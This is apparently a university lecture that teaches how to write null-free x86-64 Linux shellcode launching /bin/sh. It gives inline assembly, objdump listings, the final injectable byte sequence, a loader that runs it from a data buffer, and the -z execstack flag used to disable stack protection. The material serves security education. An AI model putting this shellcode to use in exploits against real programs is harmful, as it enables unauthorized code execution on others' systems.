Warning
The code in this lecture must be tested in a pure Ubuntu machine or in a VM.
It doesn't work in WSL.
Shellcode: Executing "/bin/sh" Program
A shellcode is the code that launchs a shell. In the lab, we will create code
for setting up a reverse shell. Naturally, the adversary would like to inject
this shellcode and have the target process run it; then the adversary will gain
a shell.
In this lecture, as preparation for the lab, we will see how to create code
that launches a local shell. For a starter, consider the following C code runthis.c.
In the end, we want to create binary executable bytes that would do a
similar task.
#include <unistd.h>
int main( )
{
char* file = "/bin/sh";
char* argv[2];
argv[0] = file;
argv[1] = 0;
char** env = 0;
execve(file, argv, env);
return 0;
}
Recall that execve executes a program. See a man page.
$ gcc -g runthis.c -o runthis
$ ./runthis
$ exit
$
Note that even if you exited, you still have a prompt. This is because you
executed a shell command "bash"!
Shellcode
A shellcode is just the assembly version of the code calling
execve("/bin/sh", ...) as above.
Shellcode Requirements
Since the shellcode should be injected as data into a target program, the
following conditions should be met so that it may work fine:
- [REQ1] Embedding the string "/bin/sh" in the shellcode itself. The target
program won't probably have the string "/bin/sh" (even if so,
we don't know where it is in the memory). To address this issue, the
shellcode itself would create and store the string "/bin/sh" in the memory so
that the
execve() function may work fine.
- [REQ2] The shellcode itself should be an injectable string data. In other
words,
- The schellcode should contain neither a NULL character nor
a white-space chracter (space, tab, or newline).
This is because the target function would probably take the shellcode as
a string input. For example, if the target function calls
scanf() to read an input string, and if the shellcode has a NULL
character in the middle, scanf() will read only the part of the
shellcode up to where the NULL character is. This means a failure of
injecting the entire shellcode, which would cause the attack to fail.
So it should pass the following python function on the right:
|
def injectable(code_data):
if b" " in code_data or b"\n" in code_data \
or b"\r" in code_data or b"\t" in code_data \
or b"\0" in code_data:
return False
return True
|
Satisfying [REQ1]: Encoding the string "/bin/sh" into a number
Creating and storing a string need some creativity, We can do something like
the following:
- Encode the 5 byte string "bash" into an integer.
See the following python script (this should makes sense to you).
>>> s = b'/bin/sh\0'
>>> n = int.from_bytes(s, 'little')
>>> hex(n)
'0x68732f6e69622f'
Using inline assembly code
// trial1.c
#include <stdio.h>
int main( )
{
asm("movabsq $0x68732f6e69622f, %rax");
asm("push %rax");
printf("a lot more to do...\n");
return 0;
}
- [create "/bin/sh"]:
movabsq instruction.
The part movabs means "move an absolute value", and the part
q means a quad-word (8 byte
number). This instruction puts our magic number into register rax.
- [store it in memory]:
push instruction.
We push this string (held by rax) onto the stack.
|
The following GDB log confirms that our code works!
(gdb) l
1 // trial1.c
2 #include <stdio.h>
3
4 int main( )
5 {
6 asm("movabsq $0x68732f6e69622f, %rax");
7 asm("push %rax");
8
9 printf("a lot more to do...\n");
10 return 0;
(gdb) b 6
Breakpoint 1 at 0x63e: file trial1.c, line 6.
(gdb) r
Starting program: /mnt/c/choi0/02teaching/it432/lec/l15/trial1
Breakpoint 1, main () at trial1.c:6
6 asm("movabsq $0x68732f6e69622f, %rax");
(gdb) stepi
7 asm("push %rax");
(gdb) p/x $rax
$1 = 0x68732f6e69622f
(gdb) stepi
9 printf("a lot more to do...\n");
(gdb) hd $rsp 20
0x7ffffffee008: 2F 62 69 6E / b i n
0x7ffffffee00c: 2F 73 68 00 / s h .
0x7ffffffee010: 60 06 00 08 ` . . .
0x7ffffffee014: 00 00 00 00 . . . .
0x7ffffffee018: F7 1B 02 FF . . . .
It will be easier to understand the above if you remember that stepi executes the
instruction shown right above.
- The first stepi executes line 6, i.e., moveabsq
- The second stepi executes line 7, i.e., push.
|
Meeting [REQ2]
Now, let's see how these assembly instructions are translated into actual
binary bytes. The objdump is useful here.
$ objdump -d trial1
...
000000000000063a <main>:
63a: 55 push %rbp
63b: 48 89 e5 mov %rsp,%rbp
63e: 48 b8 2f 62 69 6e 2f movabs $0x68732f6e69622f,%rax
645: 73 68 00
648: 50 push %rax
649: 48 8d 3d 94 00 00 00 lea 0x94(%rip),%rdi # 6e4 <_IO_stdin_used+0x4>
650: e8 bb fe ff ff callq 510 <puts@plt>
655: b8 00 00 00 00 mov $0x0,%eax
65a: 5d pop %rbp
65b: c3 retq
Unfortunately, we have a problem here. The last byte for the movabs instruction
is 00. It is not injectable! It turns out that our magic number is
0x0068732f6e69622f with a full 8-byte representation.
Fix: xor two numbers
We fix this problem using xor. That is, choose two 8-byte number a
and b (with no 0x00 anywhere to satisfy [REQ2]) such that
-
0x68732f6e69622f == a xor b.
As shown in the python script below, I chose a = 0x11....11 for
convenience. Then, we can easily find b.
>>> n = 0x68732f6e69622f
>>> a = 0x1111111111111111
>>> b = a ^ n # a xor n
>>> hex(b)
'0x1179623e7f78733e'
Pushing "/bin/sh" to the stack
Therefore, we can write the code as follows.
asm("movabsq $0x1111111111111111, %rax");
asm("movabsq $0x1179623e7f78733e, %rbx");
asm("xor %rbx, %rax"); // %rax ← %rbx xor %rax
asm("push %rax");
Passing Arguments Into the execve() Function
As you can see from the reference,
in x86-64, we use the following registers for passing arguments.
- First argument: rdi
- Second argument: rsi
- Third argument: rdx
First argument: set rdi
Recall that the first argument is the address of "/bin/sh". Since we just
pushed the "/bin/sh" on to the stack, $rsp is actually the location of the
string. So, we set %rdi ← %rsp.
asm("mov %rsp, %rdi") // %rdi ← %rsp
|
#include <unistd.h>
int main( )
{
char* file = "/bin/sh";
char* argv[2];
argv[0] = file;
argv[1] = 0;
char** env = 0;
execve(file, argv, env);
return 0;
}
|
Second argument: set rsi
The second argument is env. Since it has two entries, we first
push two objects on the stack (as the array elements of env).
Note:
- A stack has the property of "first in last out". So, we have to push the
number in reverse order; first push the 2nd element, and then push the first
element.
- The 2nd element
argv[1] is 0. So, push 0. You cannot use 0 directly, which would
violate [REQ2]. As before, we use the xor trick.
asm("xor %rax, %rax"); // xor trick; %rax ← 0
asm("push %rax"); // push 0
- The 1st element
argv[0] is the location of "/bin/sh". Luckily, rdi has it!
So, we just push the value of rdi on the stack.
asm("push %rdi"); // rdi has the location of "/bin/sh"
-
Now, we can finally set rsi for the second argument
arg to
execve. Since we just pushed the array contents of
env, the location of env is again the top of the
stack, This means we can just do %rsi ← %rsp
asm("mov %rsp, %rsi"); // %rsi ← %rsp
Third argument: set rdx
The third argument env can be set to 0. That is, we can set rdx to 0.
asm("xor %rdx, %rdx"); // %rdx ← 0
Calling execve in Assembly
Now, we are ready to call our function execve. The function is
indeed a system call.
See the syscall table in the
github page of Linus Torvalds.
The index for exeve in the syscall table is 59.
This is a way to do a system call:
- Have rax contain the right index for the system call (i.e., 59 in our case).
asm("mov $59, %rax");
- Run syscall instruction.
asm("syscall");
The Overall Code
// trial2.c
#include <stdio.h>
int main( )
{
// first argument: rdi
asm("movabsq $0x1111111111111111, %rax");
asm("movabsq $0x1179623e7f78733e, %rbx");
asm("xor %rbx, %rax");
asm("push %rax");
asm("mov %rsp, %rdi");
// second argument: rsi
asm("xor %rax, %rax");
asm("push %rax");
asm("push %rdi");
asm("mov %rsp, %rsi");
// third argumet: rdx
asm("xor %rdx, %rdx");
// execve
asm("mov $59, %rax");
asm("syscall");
return 0;
}
|
It works like a charm!
$ gcc trial2.c -o trial2
$ ./trial2
$ exit
|
[REQ2] Check: Oops in the last mov instruction
$ objdump -d trial2
00000000000005fa <main>:
5fa: 55 push %rbp
5fb: 48 89 e5 mov %rsp,%rbp
5fe: 48 b8 11 11 11 11 11 movabs $0x1111111111111111,%rax
605: 11 11 11
608: 48 bb 3e 73 78 7f 3e movabs $0x1179623e7f78733e,%rbx
60f: 62 79 11
612: 48 31 d8 xor %rbx,%rax
615: 50 push %rax
616: 48 89 e7 mov %rsp,%rdi
619: 48 31 c0 xor %rax,%rax
61c: 50 push %rax
61d: 57 push %rdi
61e: 48 89 e6 mov %rsp,%rsi
621: 48 31 d2 xor %rdx,%rdx
624: 48 c7 c0 3b 00 00 00 mov $0x3b,%rax
62b: 0f 05 syscall
62d: b8 00 00 00 00 mov $0x0,%eax
632: 5d pop %rbp
633: c3 retq
634: 66 2e 0f 1f 84 00 00 nopw %cs:0x0(%rax,%rax,1)
63b: 00 00 00
63e: 66 90 xchg %ax,%ax
Fix
Fortunately, we can easily fix the problem as follows:
// $rax contains 0 before this instruction due to xor %rax, %rax
asm("mov $59, %rax");
|
→
|
asm("mov $59, %al");
|
As shown in the reference,
%al is the last 8-bit of %rax. Since %rax contains 0 at the moment, changing %al
to 59 will lead to changing %rax to 59.
Final Shellcode
Source code: trial2.c.
$ objdump -d trial2
00000000000005fa <main>:
5fa: 55 push %rbp
5fb: 48 89 e5 mov %rsp,%rbp
5fe: 48 b8 11 11 11 11 11 movabs $0x1111111111111111,%rax
605: 11 11 11
608: 48 bb 3e 73 78 7f 3e movabs $0x1179623e7f78733e,%rbx
60f: 62 79 11
612: 48 31 d8 xor %rbx,%rax
615: 50 push %rax
616: 48 89 e7 mov %rsp,%rdi
619: 48 31 c0 xor %rax,%rax
61c: 50 push %rax
61d: 57 push %rdi
61e: 48 89 e6 mov %rsp,%rsi
621: 48 31 d2 xor %rdx,%rdx
624: b0 3b mov $0x3b,%al
626: 0f 05 syscall
628: b8 00 00 00 00 mov $0x0,%eax
62d: 5d pop %rbp
62e: c3 retq
|
48 b8 11 11 11 11 11 11 11 11
48 bb 3e 73 78 7f 3e 62 79 11
48 31 d8
50
48 89 e7
48 31 c0
50
57
48 89 e6
48 31 d2
b0 3b
0f 05
The above is stored in shtxtcode.txt
|
We can run the following python script to get the binary bytes. You need to
understand what's going on here.
# genshcode.py
s = open("shtxtcode.txt").read().split()
shellcode = bytes([int(s[i],16) for i in range(len(s))])
open("sc.bin", "wb").write(shellcode)
The final shell code is shown below:
$ python3 genshcode.py
$ hexdump -C sc.bin
00000000 48 b8 11 11 11 11 11 11 11 11 48 bb 3e 73 78 7f |H.........H.>sx.|
00000010 3e 62 79 11 48 31 d8 50 48 89 e7 48 31 c0 50 57 |>by.H1.PH..H1.PW|
00000020 48 89 e6 48 31 d2 b0 3b 0f 05 |H..H1..;..|
0000002a
Injectable?
Yes!
>>> shcode = open("sc.bin", "rb").read()
>>> injectable(shcode)
True
Let's Test the ShellCode!
// runthis2.c
int main()
{
// read the shell code into data
char data[256];
FILE* fin = fopen("sc.bin", "rb");
fread(data, sizeof(char), 256, fin);
fclose(fin);
void(*f)(); // Declare a variable f
// f is a pointer to a function with prototype
// void some_func_name ();
f = (void(*)()) data; // The pointer f now points to data (shellcode)
f(); // call f:
// since f points to the shellcode,
// the shellocode will be executed as a function!
return 0;
}
Compile: -z execstack
For security, by default, any attempt to execute code on the stack will cause
segmentation fault. To bypass this security measure of gcc, we
add "-z execstack" option when compling runthis2.c This option
allows the program to run the code that resides in the stack.
gcc -z execstack runthis2.c -o runthis2
Run!
$./runthis2
$ exit
Tip: Checking the assembly instructions of the injected code.
GDB is not overly kind to show the assembly instructions of the injected code.
However, it provides a command that allows us to do so. Whenever you want to
check the current assembly instruction, you can run the following
command:
x/i $rip